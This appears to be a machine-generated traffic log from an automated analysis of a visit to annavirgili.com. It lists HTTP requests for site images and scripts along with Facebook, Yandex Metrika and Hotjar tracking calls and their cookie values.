        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-2@4x.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /tr/?id=157851312877398&ev=PageView&dl=https%3A%2F%2Fannavirgili.com%2F&rl=&if=false&ts=1734004731323&cd[source]=woocommerce&cd[version]=6.6.1&cd[pluginVersion]=3.2.1&sw=1280&sh=1024&v=2.9.178&r=stable&a=woocommerce-6.6.1-3.2.1&ec=0&o=4126&fbp=fb.1.1734004731321.484884742687228415&ler=empty&cdl=API_unavailable&it=1734004713411&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/1-bis-scaled.jpg HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide_secondary?token=10592.xJ39efFSl6NKi173B-s1GyyZW39P8WHvsWbCdc0zyqe7ezKsL6lhE9xLp8xlf1bCCce0hAHvZZ1O6tM3JBNnH1mtJabwsaTNSrLz5Dpg6uSM2hL31dP0m_S_dE-Z4fYUUZojAywc7x8FnZbaVwWyectviqxvGFtSBeZjRhNsxKYQ3chl_iF2XdCUmKpsmLoGIw7Gg3F-zn95axvscXezyIkhtNMfMJeU4I-NRupWdMs%2C.yDK38o_7eQyKH3qJYvFBkfklAcM%2C HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; i=DnO4vSXY7NC5aA9uCWPCXb+3uOHNUPOegqIRuxaN7LAmti6Y4x+s3UJPHUCWWCCGWI6PwwsT/I/iRfw1mx3Ax/YfF/k=; yandexuid=7280385001734004721; yuidss=7280385001734004721; ymex=1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; receive-cookie-deprecation=1; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=; sync_cookie_csrf_secondary=4061231002fake; sync_cookie_csrf=3356345629fake
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide?token=10592.GPKdRjFar50ks68nMgDMTNh_wG0ewvoBb5WFaVYpeThNjYbMMU22DX6mii9UnTHw9FN-JNgTYMgrQnvw1sZlPEa5vnF-XX3dsVTna68gnTNXPSVfT3avn68Ld8Ozy0gjWp5fLjSMoYcFAl6h2jLUEcZyti5eYjCsrlKnjMjA07HCAC4iyqOKb6Z_Kjwbatrrm_OaoRNqajFktzxNA81A1meFjp8EJgefM5kh_CA4wco%2C.NQSB1bMUw3gAXNVO53Raj0C340c%2C HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; i=DnO4vSXY7NC5aA9uCWPCXb+3uOHNUPOegqIRuxaN7LAmti6Y4x+s3UJPHUCWWCCGWI6PwwsT/I/iRfw1mx3Ax/YfF/k=; yandexuid=7280385001734004721; yuidss=7280385001734004721; ymex=1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; receive-cookie-deprecation=1; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=; sync_cookie_csrf_secondary=4061231002fake; sync_cookie_csrf=3356345629fake
        Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=157851312877398&ev=PageView&dl=https%3A%2F%2Fannavirgili.com%2F&rl=&if=false&ts=1734004731323&cd[source]=woocommerce&cd[version]=6.6.1&cd[pluginVersion]=3.2.1&sw=1280&sh=1024&v=2.9.178&r=stable&a=woocommerce-6.6.1-3.2.1&ec=0&o=4126&fbp=fb.1.1734004731321.484884742687228415&ler=empty&cdl=API_unavailable&it=1734004713411&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: event-source;navigation-source, triggerAttribution-Reporting-Support: web=osSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /api/v2/client/ws?v=7&site_id=3301862 HTTP/1.1Host: ws.hotjar.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://annavirgili.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: +ap/XrB1K5cgP6FkwkvGCw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-7@4x.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /tr/?id=157851312877398&ev=AdvancedEvents&dl=https%3A%2F%2Fannavirgili.com%2F&rl=&if=false&ts=1734004731328&cd[login_status]=not_logged_in&cd[post_type]=page&cd[object_id]=8052462589213&cd[object_type]=home&cd[userAgent]=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F131.0.0.0%20Safari%2F537.36&cd[language]=en-US&cd[referrer]=&sw=1280&sh=1024&v=2.9.178&r=stable&a=woocommerce-6.6.1-3.2.1&ec=1&o=4126&fbp=fb.1.1734004731321.484884742687228415&ler=empty&cdl=API_unavailable&it=1734004713411&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=157851312877398&ev=AdvancedEvents&dl=https%3A%2F%2Fannavirgili.com%2F&rl=&if=false&ts=1734004731328&cd[login_status]=not_logged_in&cd[post_type]=page&cd[object_id]=8052462589213&cd[object_type]=home&cd[userAgent]=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F131.0.0.0%20Safari%2F537.36&cd[language]=en-US&cd[referrer]=&sw=1280&sh=1024&v=2.9.178&r=stable&a=woocommerce-6.6.1-3.2.1&ec=1&o=4126&fbp=fb.1.1734004731321.484884742687228415&ler=empty&cdl=API_unavailable&it=1734004713411&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Attribution-Reporting-Eligible: event-source;navigation-source, triggerAttribution-Reporting-Support: webSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /metrika/advert.gif HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; i=DnO4vSXY7NC5aA9uCWPCXb+3uOHNUPOegqIRuxaN7LAmti6Y4x+s3UJPHUCWWCCGWI6PwwsT/I/iRfw1mx3Ax/YfF/k=; yandexuid=7280385001734004721; yuidss=7280385001734004721; ymex=1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=; sync_cookie_csrf_secondary=4061231002fake; sync_cookie_csrf=3356345629fake; yashr=3999003891734004738
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide?token=10592.GPKdRjFar50ks68nMgDMTNh_wG0ewvoBb5WFaVYpeThNjYbMMU22DX6mii9UnTHw9FN-JNgTYMgrQnvw1sZlPEa5vnF-XX3dsVTna68gnTNXPSVfT3avn68Ld8Ozy0gjWp5fLjSMoYcFAl6h2jLUEcZyti5eYjCsrlKnjMjA07HCAC4iyqOKb6Z_Kjwbatrrm_OaoRNqajFktzxNA81A1meFjp8EJgefM5kh_CA4wco%2C.NQSB1bMUw3gAXNVO53Raj0C340c%2C HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=; sync_cookie_csrf_secondary=4061231002fake; sync_cookie_csrf=3356345629fake; yashr=3999003891734004738; yandexuid=2276949521734004716; yuidss=2276949521734004716; i=96xGCg/B76lP5HwtTxQbNXsxxopCvWDeih1g6L7RhKLFu6W66cXP1EryUhd2daztrkzFZ+CGMinOrjHdDZIHndpqRFo=; yp=1734091138.yu.7280385001734004721; ymex=1736596738.oyu.7280385001734004721#1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; sync_cookie_ok=synced
        Source: global trafficHTTP traffic detected: GET /tr/?id=157851312877398&ev=PageView&dl=https%3A%2F%2Fannavirgili.com%2F&rl=&if=false&ts=1734004731323&cd[source]=woocommerce&cd[version]=6.6.1&cd[pluginVersion]=3.2.1&sw=1280&sh=1024&v=2.9.178&r=stable&a=woocommerce-6.6.1-3.2.1&ec=0&o=4126&fbp=fb.1.1734004731321.484884742687228415&ler=empty&cdl=API_unavailable&it=1734004713411&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=157851312877398&ev=PageView&dl=https%3A%2F%2Fannavirgili.com%2F&rl=&if=false&ts=1734004731323&cd[source]=woocommerce&cd[version]=6.6.1&cd[pluginVersion]=3.2.1&sw=1280&sh=1024&v=2.9.178&r=stable&a=woocommerce-6.6.1-3.2.1&ec=0&o=4126&fbp=fb.1.1734004731321.484884742687228415&ler=empty&cdl=API_unavailable&it=1734004713411&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_decide_secondary?token=10592.xJ39efFSl6NKi173B-s1GyyZW39P8WHvsWbCdc0zyqe7ezKsL6lhE9xLp8xlf1bCCce0hAHvZZ1O6tM3JBNnH1mtJabwsaTNSrLz5Dpg6uSM2hL31dP0m_S_dE-Z4fYUUZojAywc7x8FnZbaVwWyectviqxvGFtSBeZjRhNsxKYQ3chl_iF2XdCUmKpsmLoGIw7Gg3F-zn95axvscXezyIkhtNMfMJeU4I-NRupWdMs%2C.yDK38o_7eQyKH3qJYvFBkfklAcM%2C HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=; sync_cookie_csrf_secondary=4061231002fake; sync_cookie_csrf=3356345629fake; yashr=3999003891734004738; yandexuid=2276949521734004716; yuidss=2276949521734004716; i=96xGCg/B76lP5HwtTxQbNXsxxopCvWDeih1g6L7RhKLFu6W66cXP1EryUhd2daztrkzFZ+CGMinOrjHdDZIHndpqRFo=; yp=1734091138.yu.7280385001734004721; ymex=1736596738.oyu.7280385001734004721#1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; sync_cookie_ok=synced; sync_cookie_ok_secondary=synced
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/1-bis-scaled.jpg HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=157851312877398&ev=AdvancedEvents&dl=https%3A%2F%2Fannavirgili.com%2F&rl=&if=false&ts=1734004731328&cd[login_status]=not_logged_in&cd[post_type]=page&cd[object_id]=8052462589213&cd[object_type]=home&cd[userAgent]=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F131.0.0.0%20Safari%2F537.36&cd[language]=en-US&cd[referrer]=&sw=1280&sh=1024&v=2.9.178&r=stable&a=woocommerce-6.6.1-3.2.1&ec=1&o=4126&fbp=fb.1.1734004731321.484884742687228415&ler=empty&cdl=API_unavailable&it=1734004713411&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /tr/?id=157851312877398&ev=AdvancedEvents&dl=https%3A%2F%2Fannavirgili.com%2F&rl=&if=false&ts=1734004731328&cd[login_status]=not_logged_in&cd[post_type]=page&cd[object_id]=8052462589213&cd[object_type]=home&cd[userAgent]=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F131.0.0.0%20Safari%2F537.36&cd[language]=en-US&cd[referrer]=&sw=1280&sh=1024&v=2.9.178&r=stable&a=woocommerce-6.6.1-3.2.1&ec=1&o=4126&fbp=fb.1.1734004731321.484884742687228415&ler=empty&cdl=API_unavailable&it=1734004713411&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/SLIDER-4-scaled.jpg HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
